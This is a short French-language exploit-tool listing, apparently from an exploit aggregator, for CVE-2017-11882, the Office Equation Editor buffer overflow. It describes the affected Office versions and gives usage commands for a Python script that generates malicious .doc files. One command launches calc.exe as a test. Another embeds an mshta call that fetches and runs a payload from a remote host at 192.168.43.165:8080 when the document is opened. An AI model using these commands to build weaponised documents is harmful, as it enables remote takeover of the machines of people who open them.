## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LITTLEBIN404-CVE-2017-11882
## Aperçu de CVE-2017-11882
Du point de vue de l'exploitation, il peut toucher toutes les versions d'Office de 2003 à 2016, et la mise en place de l'environnement d'attaque est très simple. Cette vulnérabilité est causée par l'[Éditeur d'équations] dans Office. Comme le processus de l'éditeur ne vérifie pas la longueur des noms, cela provoque un débordement de tampon, et un attaquant peut exécuter du code arbitraire en construisant des caractères spéciaux. Par exemple, si un pirate exploite cette vulnérabilité pour créer un fichier Office avec une backdoor shell, lorsque l'utilisateur ordinaire ouvre ce fichier, l'ordinateur peut être directement contrôlé par le pirate.
## Versions affectées :
root@kitploit:~
office 2003
office 2007
office 2010
office 2013
office 2016
## Usage
root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Cliquez sur le fichier "test.doc" généré, la calculatrice apparaît avec succès.
root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc
